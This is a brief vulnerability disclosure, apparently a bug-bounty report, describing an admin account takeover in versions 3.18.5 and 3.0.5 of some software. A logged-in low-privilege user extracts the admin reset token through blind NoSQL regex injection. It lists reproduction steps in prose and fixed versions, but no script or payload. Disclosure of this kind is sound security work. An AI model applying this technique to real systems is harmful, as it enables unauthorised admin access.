Regex account takeover

**Summary:** get admin reset token with authenticated user **Description:** normal user login can access to admin reset token and set a new password for admin user ## Releases Affected: * 3.18.5 * 3.0.5 ## Steps To Reproduce (from initial installation to vulnerability): (Add details for how we can reproduce the issue) 1. login with low privilege user 2. copy rc_uid and rc_token for script 3. request for admin email password you can find admin mail with the script 4. run python script to get reset token with "blind no SQL injection" ( regex search ) ## Supporting Material/References: * ## Suggested mitigation * [list any suggested patches or steps to mitigate the problem] ## Impact the attacker could gain admin access and escalate their own user ## Fix 3.18.6, 4.4.4 and 4.7.3>